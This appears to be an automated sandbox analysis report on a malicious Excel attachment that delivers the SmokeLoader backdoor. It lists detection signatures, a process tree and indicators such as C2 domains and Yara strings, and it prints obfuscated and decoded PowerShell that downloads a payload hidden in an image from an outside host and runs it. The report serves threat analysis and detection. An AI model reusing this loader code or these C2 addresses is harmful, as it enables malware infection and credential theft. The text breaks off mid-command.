Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
#20240627_Edlen_B.xls

Overview

General Information

Sample name:#20240627_Edlen_B.xls
Analysis ID:1448373
MD5:c3dc8fb22795f4efb58e63c8f2110561
SHA1:97e7c1949993ce9246baf1bb5c9d4f34020435f4
SHA256:3df16653affd5ddd6a27c4b9a4e92aa3e4b87fc61b4332b7c9675ba1cfc8a70f
Tags:xls
Infos:

Detection

SmokeLoader
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for URL or domain
Antivirus detection for dropped file
Benign windows process drops PE files
Found malware configuration
Malicious sample detected (through community Yara rule)
Microsoft Office launches external ms-search protocol handler (WebDAV)
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for submitted file
Sigma detected: EQNEDT32.EXE connecting to internet
Sigma detected: File Dropped By EQNEDT32EXE
Sigma detected: Powershell download and load assembly
Sigma detected: Powershell download payload from hardcoded c2 list
Snort IDS alert for network traffic
System process connects to network (likely due to code injection or exploit)
Yara detected Powershell download and execute
Yara detected SmokeLoader
Bypasses PowerShell execution policy
C2 URLs / IPs found in malware configuration
Checks for kernel code integrity (NtQuerySystemInformation(CodeIntegrityInformation))
Checks if browser processes are running
Checks if the current machine is a virtual machine (disk enumeration)
Connects to a pastebin service (likely for C&C)
Contains functionality to compare user and computer (likely to detect sandboxes)
Creates a thread in another existing process (thread injection)
Document exploit detected (process start blacklist hit)
Excel sheet contains many unusual embedded objects
Found evasive API chain (may stop execution after checking mutex)
Hides that the sample has been downloaded from the Internet (zone.identifier)
Injects a PE file into a foreign processes
Injects code into the Windows Explorer (explorer.exe)
Installs new ROOT certificates
Maps a DLL or memory area into another process
Microsoft Office drops suspicious files
Office equation editor establishes network connection
Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)
Office viewer loads remote template
Sigma detected: Base64 Encoded PowerShell Command Detected
Sigma detected: Equation Editor Network Connection
Sigma detected: Potential PowerShell Obfuscation Via Reversed Commands
Sigma detected: PowerShell Base64 Encoded FromBase64String Cmdlet
Sigma detected: Script Initiated Connection to Non-Local Network
Sigma detected: Suspicious Microsoft Office Child Process
Sigma detected: WScript or CScript Dropper
Suspicious execution chain found
Suspicious powershell command line found
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Very long command line found
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Writes to foreign memory regions
Wscript starts Powershell (via cmd or directly)
Yara detected Generic Downloader
Allocates memory with a write watch (potentially for evading sandboxes)
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Checks if the current process is being debugged
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to check the parent process ID (often done to detect debuggers and analysis systems)
Contains functionality to dynamically determine API calls
Contains functionality to enumerate process and check for explorer.exe or svchost.exe (often used for thread injection)
Contains functionality to query CPU information (cpuid)
Contains functionality to retrieve information about pressed keystrokes
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Deletes files inside the Windows folder
Detected potential crypto function
Document contains Microsoft Equation 3.0 OLE entries
Document contains embedded VBA macros
Document embeds suspicious OLE2 link
Document misses a certain OLE stream usually present in this Microsoft Office document type
Dropped file seen in connection with other malware
Drops PE files
Drops files with a non-matching file extension (content does not match file extension)
Enables debug privileges
Extensive use of GetProcAddress (often used to hide API calls)
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Office Equation Editor has been started
Potential document exploit detected (performs DNS queries)
Potential document exploit detected (performs HTTP gets)
Potential document exploit detected (unknown TCP traffic)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Searches for user specific document files
Sigma detected: Change PowerShell Policies to an Insecure Level
Sigma detected: Excel Network Connections
Sigma detected: Execution of Suspicious File Type Extension
Sigma detected: Script Initiated Connection
Sigma detected: Suspicious Office Outbound Connections
Sigma detected: Suspicious PowerShell Invocations - Specific - ProcessCreation
Sigma detected: Usage Of Web Request Commands And Cmdlets
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Stores large binary data to the registry
Uses Microsoft's Enhanced Cryptographic Provider
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Uses insecure TLS / SSL version for HTTPS connection
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara signature match

Classification

  • System is w7x64
  • EXCEL.EXE (PID: 1440 cmdline: "C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding MD5: D53B85E21886D2AF9815C377537BCAC3)
    • WINWORD.EXE (PID: 2504 cmdline: "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" -Embedding MD5: 9EE74859D22DAE61F1750B3A1BACB6F5)
      • EQNEDT32.EXE (PID: 3148 cmdline: "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding MD5: A87236E214F6D42A65F5DEDAC816AEC8)
    • wscript.exe (PID: 3220 cmdline: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\lionarekingofjungleimageshes.vbs" MD5: 979D74799EA6C8B8167869A68DF5204A)
      • powershell.exe (PID: 3308 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "$codigo = 'ZgB1DgTreG4DgTreYwB0DgTreGkDgTrebwBuDgTreCDgTreDgTreRDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreEQDgTreYQB0DgTreGEDgTreRgByDgTreG8DgTrebQBMDgTreGkDgTrebgBrDgTreHMDgTreIDgTreB7DgTreCDgTreDgTrecDgTreBhDgTreHIDgTreYQBtDgTreCDgTreDgTreKDgTreBbDgTreHMDgTredDgTreByDgTreGkDgTrebgBnDgTreFsDgTreXQBdDgTreCQDgTrebDgTreBpDgTreG4DgTreawBzDgTreCkDgTreIDgTreDgTrekDgTreHcDgTreZQBiDgTreEMDgTrebDgTreBpDgTreGUDgTrebgB0DgTreCDgTreDgTrePQDgTregDgTreE4DgTreZQB3DgTreC0DgTreTwBiDgTreGoDgTreZQBjDgTreHQDgTreIDgTreBTDgTreHkDgTrecwB0DgTreGUDgTrebQDgTreuDgTreE4DgTreZQB0DgTreC4DgTreVwBlDgTreGIDgTreQwBsDgTreGkDgTreZQBuDgTreHQDgTreOwDgTregDgTreCQDgTreZDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreGUDgTreZDgTreBEDgTreGEDgTredDgTreBhDgTreCDgTreDgTrePQDgTregDgTreEDgTreDgTreKDgTreDgTrepDgTreDsDgTreIDgTreDgTrekDgTreHMDgTreaDgTreB1DgTreGYDgTreZgBsDgTreGUDgTreZDgTreBMDgTreGkDgTrebgBrDgTreHMDgTreIDgTreDgTre9DgTreCDgTreDgTreJDgTreBsDgTreGkDgTrebgBrDgTreHMDgTreIDgTreB8DgTreCDgTreDgTreRwBlDgTreHQDgTreLQBSDgTreGEDgTrebgBkDgTreG8DgTrebQDgTregDgTreC0DgTreQwBvDgTreHUDgTrebgB0DgTreCDgTreDgTreJDgTreBsDgTreGkDgTrebgBrDgTreHMDgTreLgBMDgTreGUDgTrebgBnDgTreHQDgTreaDgTreDgTre7DgTreCDgTreDgTreZgBvDgTreHIDgTreZQBhDgTreGMDgTreaDgTreDgTregDgTreCgDgTreJDgTreBsDgTreGkDgTrebgBrDgTreCDgTreDgTreaQBuDgTreCDgTreDgTreJDgTreBzDgTreGgDgTredQBmDgTreGYDgTrebDgTreBlDgTreGQDgTreTDgTreBpDgTreG4DgTreawBzDgTreCkDgTreIDgTreB7DgTreCDgTreDgTredDgTreByDgTreHkDgTreIDgTreB7DgTreCDgTreDgTreJDgTreBkDgTreG8DgTredwBuDgTreGwDgTrebwBhDgTreGQDgTreZQBkDgTreEQDgTreYQB0DgTreGEDgTreIDgTreDgTrerDgTreD0DgTreIDgTreDgTrekDgTreHcDgTreZQBiDgTreEMDgTrebDgTreBpDgTreGUDgTrebgB0DgTreC4DgTreRDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreEQDgTreYQB0DgTreGEDgTreKDgTreDgTrekDgTreGwDgTreaQBuDgTreGsDgTreKQDgTregDgTreH0DgTreIDgTreBjDgTreGEDgTredDgTreBjDgTreGgDgTreIDgTreB7DgTreCDgTreDgTreYwBvDgTreG4DgTredDgTreBpDgTreG4DgTredQBlDgTreCDgTreDgTrefQDgTregDgTreH0DgTreOwDgTregDgTreHIDgTreZQB0DgTreHUDgTrecgBuDgTreCDgTreDgTreJDgTreBkDgTreG8DgTredwBuDgTreGwDgTrebwBhDgTreGQDgTreZQBkDgTreEQDgTreYQB0DgTreGEDgTreIDgTreB9DgTreDsDgTreIDgTreDgTrekDgTreGwDgTreaQBuDgTreGsDgTrecwDgTregDgTreD0DgTreIDgTreBDgTreDgTreCgDgTreJwBoDgTreHQDgTredDgTreBwDgTreHMDgTreOgDgTrevDgTreC8DgTredQBwDgTreGwDgTrebwBhDgTreGQDgTreZDgTreBlDgTreGkDgTrebQBhDgTreGcDgTreZQBuDgTreHMDgTreLgBjDgTreG8DgTrebQDgTreuDgTreGIDgTrecgDgTrevDgTreGkDgTrebQBhDgTreGcDgTreZQBzDgTreC8DgTreMDgTreDgTrewDgTreDQDgTreLwDgTre3DgTreDgDgTreNQDgTrevDgTreDcDgTreMgDgTrewDgTreC8DgTrebwByDgTreGkDgTreZwBpDgTreG4DgTreYQBsDgTreC8DgTrebgBlDgTreHcDgTreXwBpDgTreG0DgTreYQBnDgTreGUDgTreLgBqDgTreHDgTreDgTreZwDgTre/DgTreDEDgTreNwDgTrexDgTreDYDgTreMwDgTrewDgTreDcDgTreNgDgTrezDgTreDQDgTreJwDgTresDgTreCDgTreDgTreJwBoDgTreHQDgTredDgTreBwDgTreHMDgTreOgDgTrevDgTreC8DgTredQBwDgTreGwDgTrebwBhDgTreGQDgTreZDgTreBlDgTreGkDgTrebQBhDgTreGcDgTreZQBuDgTreHMDgTreLgBjDgTreG8DgTrebQDgTreuDgTreGIDgTrecgDgTrevDgTreGkDgTrebQBhDgTreGcDgTreZQBzDgTreC8DgTreMDgTreDgTrewDgTreDQDgTreLwDgTre3DgTreDgDgTreNQDgTrevDgTreDcDgTreMgDgTrewDgTreC8DgTrebwByDgTreGkDgTreZwBpDgTreG4DgTreYQBsDgTreC8DgTrebgBlDgTreHcDgTreXwBpDgTreG0DgTreYQBnDgTreGUDgTreLgBqDgTreHDgTreDgTreZwDgTre/DgTreDEDgTreNwDgTrexDgTreDYDgTreMwDgTrewDgTreDcDgTreNgDgTrezDgTreDQDgTreJwDgTrepDgTreDsDgTreIDgTreDgTrekDgTreGkDgTrebQBhDgTreGcDgTreZQBCDgTreHkDgTredDgTreBlDgTreHMDgTreIDgTreDgTre9DgTreCDgTreDgTreRDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreEQDgTreYQB0DgTreGEDgTreRgByDgTreG8DgTrebQBMDgTreGkDgTrebgBrDgTreHMDgTreIDgTreDgTrekDgTreGwDgTreaQBuDgTreGsDgTrecwDgTre7DgTreCDgTreDgTreaQBmDgTreCDgTreDgTreKDgTreDgTrekDgTreGkDgTrebQBhDgTreGcDgTreZQBCDgTreHkDgTredDgTreBlDgTreHMDgTreIDgTreDgTretDgTreG4DgTreZQDgTregDgTreCQDgTrebgB1DgTreGwDgTrebDgTreDgTrepDgTreCDgTreDgTreewDgTregDgTreCQDgTreaQBtDgTreGEDgTreZwBlDgTreFQDgTreZQB4DgTreHQDgTreIDgTreDgTre9DgTreCDgTreDgTreWwBTDgTreHkDgTrecwB0DgTreGUDgTrebQDgTreuDgTreFQDgTreZQB4DgTreHQDgTreLgBFDgTreG4DgTreYwBvDgTreGQDgTreaQBuDgTreGcDgTreXQDgTre6DgTreDoDgTreVQBUDgTreEYDgTreODgTreDgTreuDgTreEcDgTreZQB0DgTreFMDgTredDgTreByDgTreGkDgTrebgBnDgTreCgDgTreJDgTreBpDgTreG0DgTreYQBnDgTreGUDgTreQgB5DgTreHQDgTreZQBzDgTreCkDgTreOwDgTregDgTreCQDgTrecwB0DgTreGEDgTrecgB0DgTreEYDgTrebDgTreBhDgTreGcDgTreIDgTreDgTre9DgTreCDgTreDgTreJwDgTre8DgTreDwDgTreQgBBDgTreFMDgTreRQDgTre2DgTreDQDgTreXwBTDgTreFQDgTreQQBSDgTreFQDgTrePgDgTre+DgTreCcDgTreOwDgTregDgTreCQDgTreZQBuDgTreGQDgTreRgBsDgTreGEDgTreZwDgTregDgTreD0DgTreIDgTreDgTrenDgTreDwDgTrePDgTreBCDgTreEEDgTreUwBFDgTreDYDgTreNDgTreBfDgTreEUDgTreTgBEDgTreD4DgTrePgDgTrenDgTreDsDgTreIDgTreDgTrekDgTreHMDgTredDgTreBhDgTreHIDgTredDgTreBJDgTreG4DgTreZDgTreBlDgTreHgDgTreIDgTreDgTre9DgTreCDgTreDgTreJDgTreBpDgTreG0DgTreYQBnDgTreGUDgTreVDgTreBlDgTreHgDgTredDgTreDgTreuDgTreEkDgTrebgBkDgTreGUDgTreeDgTreBPDgTreGYDgTreKDgTreDgTrekDgTreHMDgTredDgTreBhDgTreHIDgTredDgTreBGDgTreGwDgTreYQBnDgTreCkDgTreOwDgTregDgTreCQDgTreZQBuDgTreGQDgTreSQBuDgTreGQDgTreZQB4DgTreCDgTreDgTrePQDgTregDgTreCQDgTreaQBtDgTreGEDgTreZwBlDgTreFQDgTreZQB4DgTreHQDgTreLgBJDgTreG4DgTreZDgTreBlDgTreHgDgTreTwBmDgTreCgDgTreJDgTreBlDgTreG4DgTreZDgTreBGDgTreGwDgTreYQBnDgTreCkDgTreOwDgTregDgTreGkDgTreZgDgTregDgTreCgDgTreJDgTreBzDgTreHQDgTreYQByDgTreHQDgTreSQBuDgTreGQDgTreZQB4DgTreCDgTreDgTreLQBnDgTreGUDgTreIDgTreDgTrewDgTreCDgTreDgTreLQBhDgTreG4DgTreZDgTreDgTregDgTreCQDgTreZQBuDgTreGQDgTreSQBuDgTreGQDgTreZQB4DgTreCDgTreDgTreLQBnDgTreHQDgTreIDgTreDgTrekDgTreHMDgTredDgTreBhDgTreHIDgTredDgTreBJDgTreG4DgTreZDgTreBlDgTreHgDgTreKQDgTregDgTreHsDgTreIDgTreDgTrekDgTreHMDgTredDgTreBhDgTreHIDgTredDgTreBJDgTreG4DgTreZDgTreBlDgTreHgDgTreIDgTreDgTrerDgTreD0DgTreIDgTreDgTrekDgTreHMDgTredDgTreBhDgTreHIDgTredDgTreBGDgTreGwDgTreYQBnDgTreC4DgTreTDgTreBlDgTreG4DgTreZwB0DgTreGgDgTreOwDgTregDgTreCQDgTreYgBhDgTreHMDgTreZQDgTre2DgTreDQDgTreTDgTreBlDgTreG4DgTreZwB0DgTreGgDgTreIDgTreDgTre9DgTreCDgTreDgTreJDgTreBlDgTreG4DgTreZDgTreBJDgTreG4DgTreZDgTreBlDgTreHgDgTreIDgTreDgTretDgTreCDgTreDgTreJDgTreBzDgTreHQDgTreYQByDgTreHQDgTreSQBuDgTreGQDgTreZQB4DgTreDsDgTreIDgTreDgTrekDgTreGIDgTreYQBzDgTreGUDgTreNgDgTre0DgTreEMDgTrebwBtDgTreG0DgTreYQBuDgTreGQDgTreIDgTreDgTre9DgTreCDgTreDgTreJDgTreBpDgTreG0DgTreYQBnDgTreGUDgTreVDgTreBlDgTreHgDgTredDgTreDgTreuDgTreFMDgTredQBiDgTreHMDgTredDgTreByDgTreGkDgTrebgBnDgTreCgDgTreJDgTreBzDgTreHQDgTreYQByDgTreHQDgTreSQBuDgTreGQDgTreZQB4DgTreCwDgTreIDgTreDgTrekDgTreGIDgTreYQBzDgTreGUDgTreNgDgTre0DgTreEwDgTreZQBuDgTreGcDgTredDgTreBoDgTreCkDgTreOwDgTregDgTreCQDgTreYwBvDgTreG0DgTrebQBhDgTreG4DgTreZDgTreBCDgTreHkDgTredDgTreBlDgTreHMDgTreIDgTreDgTre9DgTreCDgTreDgTreWwBTDgTreHkDgTrecwB0DgTreGUDgTrebQDgTreuDgTreEMDgTrebwBuDgTreHYDgTreZQByDgTreHQDgTreXQDgTre6DgTreDoDgTreRgByDgTreG8DgTrebQBCDgTreGEDgTrecwBlDgTreDYDgTreNDgTreBTDgTreHQDgTrecgBpDgTreG4DgTreZwDgTreoDgTreCQDgTreYgBhDgTreHMDgTreZQDgTre2DgTreDQDgTreQwBvDgTreG0DgTrebQBhDgTreG4DgTreZDgTreDgTrepDgTreDsDgTreIDgTreDgTrekDgTreGwDgTrebwBhDgTreGQDgTreZQBkDgTreEEDgTrecwBzDgTreGUDgTrebQBiDgTreGwDgTreeQDgTregDgTreD0DgTreIDgTreBbDgTreFMDgTreeQBzDgTreHQDgTreZQBtDgTreC4DgTreUgBlDgTreGYDgTrebDgTreBlDgTreGMDgTredDgTreBpDgTreG8DgTrebgDgTreuDgTreEEDgTrecwBzDgTreGUDgTrebQBiDgTreGwDgTreeQBdDgTreDoDgTreOgBMDgTreG8DgTreYQBkDgTreCgDgTreJDgTreBjDgTreG8DgTrebQBtDgTreGEDgTrebgBkDgTreEIDgTreeQB0DgTreGUDgTrecwDgTrepDgTreDsDgTreIDgTreDgTrekDgTreHQDgTreeQBwDgTreGUDgTreIDgTreDgTre9DgTreCDgTreDgTreJDgTreBsDgTreG8DgTreYQBkDgTreGUDgTreZDgTreBBDgTreHMDgTrecwBlDgTreG0DgTreYgBsDgTreHkDgTreLgBHDgTreGUDgTredDgTreBUDgTreHkDgTrecDgTreBlDgTreCgDgTreJwBQDgTreFIDgTreTwBKDgTreEUDgTreVDgTreBPDgTreEEDgTreVQBUDgTreE8DgTreTQBBDgTreEMDgTreQQBPDgTreC4DgTreVgBCDgTreC4DgTreSDgTreBvDgTreG0DgTreZQDgTrenDgTreCkDgTreOwDgTregDgTreCQDgTrebQBlDgTreHQDgTreaDgTreBvDgTreGQDgTreIDgTreDgTre9DgTreCDgTreDgTreJDgTreB0DgTreHkDgTrecDgTreBlDgTreC4DgTreRwBlDgTreHQDgTreTQBlDgTreHQDgTreaDgTreBvDgTreGQDgTreKDgTreDgTrenDgTreFYDgTreQQBJDgTreCcDgTreKQDgTreuDgTreEkDgTrebgB2DgTreG8DgTreawBlDgTreCgDgTreJDgTreBuDgTreHUDgTrebDgTreBsDgTreCwDgTreIDgTreBbDgTreG8DgTreYgBqDgTreGUDgTreYwB0DgTreFsDgTreXQBdDgTreCDgTreDgTreKDgTreDgTrenDgTreHQDgTreeDgTreB0DgTreC4DgTreRwBCDgTreFIDgTreLwDgTrewDgTreDgDgTreMDgTreDgTre4DgTreC8DgTreNgDgTre1DgTreDEDgTreLgDgTre3DgTreDcDgTreMQDgTreuDgTreDYDgTreNDgTreDgTreuDgTreDgDgTreOQDgTrexDgTreC8DgTreLwDgTre6DgTreHDgTreDgTredDgTreB0DgTreGgDgTreJwDgTregDgTreCwDgTreIDgTreDgTrenDgTreGQDgTreZQBzDgTreGEDgTredDgTreBpDgTreHYDgTreYQBkDgTreG8DgTreJwDgTregDgTreCwDgTreIDgTreDgTrenDgTreGQDgTreZQBzDgTreGEDgTredDgTreBpDgTreHYDgTreYQBkDgTreG8DgTreJwDgTregDgTreCwDgTreIDgTreDgTrenDgTreGQDgTreZQBzDgTreGEDgTredDgTreBpDgTreHYDgTreYQBkDgTreG8DgTreJwDgTresDgTreCcDgTreUgBlDgTreGcDgTreQQBzDgTreG0DgTreJwDgTresDgTreCcDgTreJwDgTrepDgTreCkDgTrefQDgTregDgTreH0DgTre';$oWjuxd = [system.Text.encoding]::Unicode.GetString([system.convert]::Frombase64string( $codigo.replace('DgTre','A') ));powershell.exe -windowstyle hidden -executionpolicy bypass -Noprofile -command $OWjuxD" MD5: EB32C070E658937AA9FA9F3AE629B2B8)
        • powershell.exe (PID: 3404 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -Noprofile -command "function DownloadDataFromLinks { param ([string[]]$links) $webClient = New-Object System.Net.WebClient; $downloadedData = @(); $shuffledLinks = $links | Get-Random -Count $links.Length; foreach ($link in $shuffledLinks) { try { $downloadedData += $webClient.DownloadData($link) } catch { continue } }; return $downloadedData }; $links = @('https://uploaddeimagens.com.br/images/004/785/720/original/new_image.jpg?1716307634', 'https://uploaddeimagens.com.br/images/004/785/720/original/new_image.jpg?1716307634'); $imageBytes = DownloadDataFromLinks $links; if ($imageBytes -ne $null) { $imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes); $startFlag = '<<BASE64_START>>'; $endFlag = '<<BASE64_END>>'; $startIndex = $imageText.IndexOf($startFlag); $endIndex = $imageText.IndexOf($endFlag); if ($startIndex -ge 0 -and $endIndex -gt $startIndex) { $startIndex += $startFlag.Length; $base64Length = $endIndex - $startIndex; $base64Command = $imageText.Substring($startIndex, $base64Length); $commandBytes = [System.Convert]::FromBase64String($base64Command); $loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes); $type = $loadedAssembly.GetType('PROJETOAUTOMACAO.VB.Home'); $method = $type.GetMethod('VAI').Invoke($null, [object[]] ('txt.GBR/0808/651.771.64.891//:ptth' , 'desativado' , 'desativado' , 'desativado','RegAsm',''))} }" MD5: EB32C070E658937AA9FA9F3AE629B2B8)
          • RegAsm.exe (PID: 3588 cmdline: "C:\Windows\Microsoft.Net\Framework\v4.0.30319\RegAsm.exe" MD5: 8FE9545E9F72E460723F484C304314AD)
            • explorer.exe (PID: 1244 cmdline: C:\Windows\Explorer.EXE MD5: 38AE1B3C38FAEF56FE4907922F0385BA)
              • explorer.exe (PID: 3864 cmdline: C:\Windows\SysWOW64\explorer.exe MD5: 6DDCA324434FFA506CF7DC4E51DB7935)
              • explorer.exe (PID: 3892 cmdline: C:\Windows\explorer.exe MD5: 38AE1B3C38FAEF56FE4907922F0385BA)
              • explorer.exe (PID: 3908 cmdline: C:\Windows\SysWOW64\explorer.exe MD5: 6DDCA324434FFA506CF7DC4E51DB7935)
              • explorer.exe (PID: 3948 cmdline: C:\Windows\SysWOW64\explorer.exe MD5: 6DDCA324434FFA506CF7DC4E51DB7935)
              • explorer.exe (PID: 3960 cmdline: C:\Windows\explorer.exe MD5: 38AE1B3C38FAEF56FE4907922F0385BA)
              • explorer.exe (PID: 3976 cmdline: C:\Windows\SysWOW64\explorer.exe MD5: 6DDCA324434FFA506CF7DC4E51DB7935)
              • explorer.exe (PID: 4068 cmdline: C:\Windows\explorer.exe MD5: 38AE1B3C38FAEF56FE4907922F0385BA)
              • explorer.exe (PID: 3088 cmdline: C:\Windows\SysWOW64\explorer.exe MD5: 6DDCA324434FFA506CF7DC4E51DB7935)
              • explorer.exe (PID: 3080 cmdline: C:\Windows\explorer.exe MD5: 38AE1B3C38FAEF56FE4907922F0385BA)
  • taskeng.exe (PID: 3784 cmdline: taskeng.exe {3AFD0624-861F-4A6A-8994-E838F818ED19} S-1-5-21-966771315-3019405637-367336477-1006:user-PC\user:Interactive:[1] MD5: 65EA57712340C09B1B0C427B4848AE05)
    • rugtucw (PID: 3820 cmdline: C:\Users\user\AppData\Roaming\rugtucw MD5: 8FE9545E9F72E460723F484C304314AD)
  • cleanup
NameDescriptionAttributionBlogpost URLsLink
SmokeLoaderThe SmokeLoader family is a generic backdoor with a range of capabilities which depend on the modules included in any given build of the malware. The malware is delivered in a variety of ways and is broadly associated with criminal activity. The malware frequently tries to hide its C2 activity by generating requests to legitimate sites such as microsoft.com, bing.com, adobe.com, and others. Typically the actual Download returns an HTTP 404 but still contains data in the Response Body.
  • SMOKY SPIDER
https://malpedia.caad.fkie.fraunhofer.de/details/win.smokeloader
{"Version": 2022, "C2 list": ["http://prolinice.ga/index.php", "http://vilendar.ga/index.php"]}
SourceRuleDescriptionAuthorStrings
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\6619CBCE.docINDICATOR_RTF_MalVer_ObjectsDetects RTF documents with non-standard version and embeding one of the object mostly observed in exploit documents.ditekSHen
  • 0x694:$obj2: \objdata
  • 0x67a:$obj3: \objupdate
  • 0x655:$obj6: \objlink
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\lionsarebeautifultoruletheforestandtheyalwayskingogthejunglewhoneverknowmanythingkingisrigerbutlionisthekingo__junglelionbeautiufl[1].docINDICATOR_RTF_MalVer_ObjectsDetects RTF documents with non-standard version and embeding one of the object mostly observed in exploit documents.ditekSHen
  • 0x694:$obj2: \objdata
  • 0x67a:$obj3: \objupdate
  • 0x655:$obj6: \objlink
SourceRuleDescriptionAuthorStrings
0000000D.00000002.473315966.00000000000A0000.00000004.00001000.00020000.00000000.sdmpJoeSecurity_SmokeLoader_2Yara detected SmokeLoaderJoe Security
    0000000D.00000002.473315966.00000000000A0000.00000004.00001000.00020000.00000000.sdmpWindows_Trojan_Smokeloader_4e31426eunknownunknown
    • 0x5d4:$a: 5B 81 EB 34 10 00 00 6A 30 58 64 8B 00 8B 40 0C 8B 40 1C 8B 40 08 89 85 C0
    00000018.00000002.618080240.0000000000081000.00000040.80000000.00040000.00000000.sdmpJoeSecurity_SmokeLoaderYara detected SmokeLoaderJoe Security
      0000000D.00000002.473503358.0000000000181000.00000004.10000000.00040000.00000000.sdmpJoeSecurity_SmokeLoader_2Yara detected SmokeLoaderJoe Security
        0000000D.00000002.473503358.0000000000181000.00000004.10000000.00040000.00000000.sdmpWindows_Trojan_Smokeloader_4e31426eunknownunknown
        • 0x1d4:$a: 5B 81 EB 34 10 00 00 6A 30 58 64 8B 00 8B 40 0C 8B 40 1C 8B 40 08 89 85 C0
        Click to see the 10 entries
        SourceRuleDescriptionAuthorStrings
        13.2.RegAsm.exe.400000.0.unpackJoeSecurity_SmokeLoader_2Yara detected SmokeLoaderJoe Security
          12.2.powershell.exe.9260000.1.raw.unpackJoeSecurity_GenericDownloader_1Yara detected Generic DownloaderJoe Security

            Exploits

            barindex
            Source: Network ConnectionAuthor: Joe Security: Data: DestinationIp: 198.46.177.156, DestinationIsIpv6: false, DestinationPort: 80, EventID: 3, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, Initiated: true, ProcessId: 3148, Protocol: tcp, SourceIp: 192.168.2.22, SourceIsIpv6: false, SourcePort: 49173
            Source: File createdAuthor: Joe Security: Data: EventID: 11, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ProcessId: 3148, TargetFilename: C:\Users\user\AppData\Roaming\lionarekingofjungleimageshes.vbs

            Spreading

            barindex
            Source: Process startedAuthor: Joe Security: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -Noprofile -command "function DownloadDataFromLinks { param ([string[]]$links) $webClient = New-Object System.Net.WebClient; $downloadedData = @(); $shuffledLinks = $links | Get-Random -Count $links.Length; foreach ($link in $shuffledLinks) { try { $downloadedData += $webClient.DownloadData($link) } catch { continue } }; return $downloadedData }; $links = @('https://uploaddeimagens.com.br/images/004/785/720/original/new_image.jpg?1716307634', 'https://uploaddeimagens.com.br/images/004/785/720/original/new_image.jpg?1716307634'); $imageBytes = DownloadDataFromLinks $links; if ($imageBytes -ne $null) { $imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes); $startFlag = '<<BASE64_START>>'; $endFlag = '<<BASE64_END>>'; $startIndex = $imageText.IndexOf($startFlag); $endIndex = $imageText.IndexOf($endFlag); if ($startIndex -ge 0 -and $endIndex -gt $startIndex) { $startIndex += $startFlag.Length; $base64Length = $endIndex - $startIndex; $base64Command = $imageText.Substring($startIndex, $base64Length); $commandBytes = [System.Convert]::FromBase64String($base64Command); $loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes); $type = $loadedAssembly.GetType('PROJETOAUTOMACAO.VB.Home'); $method = $type.GetMethod('VAI').Invoke($null, [object[]] ('txt.GBR/0808/651.771.64.891//:ptth' , 'desativado' , 'desativado' , 'desativado','RegAsm',''))} }", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -Noprofile -command "function DownloadDataFromLinks { param ([string[]]$links) $webClient = New-Object System.Net.WebClient; $downloadedData = @(); $shuffledLinks = $links | Get-Random -Count $links.Length; foreach ($link in $shuffledLinks) { try { $downloadedData += $webClient.DownloadData($link) } catch { continue } }; return $downloadedData }; $links = @('https://uploaddeimagens.com.br/images/004/785/720/original/new_image.jpg?1716307634', 'https://uploaddeimagens.com.br/images/004/785/720/original/new_image.jpg?1716307634'); $imageBytes = DownloadDataFromLinks $links; if ($imageBytes -ne $null) { $imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes); $startFlag = '<<BASE64_START>>'; $endFlag = '<<BASE64_END>>'; $startIndex = $imageText.IndexOf($startFlag); $endIndex = $imageText.IndexOf($endFlag); if ($startIndex -ge 0 -and $endIndex -gt $startIndex) { $startIndex += $startFlag.Length; $base64Length = $endIndex - $startIndex; $base64Command = $imageText.Substring($startIndex, $base64Length); $commandBytes = [System.Convert]::FromBase64String($base64Command); $loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes); $type = $loadedAssembly.GetType('PROJETOAUTOMACAO.VB.Home'); $method = $type.GetMethod('VAI').Invoke($null, [object[]] 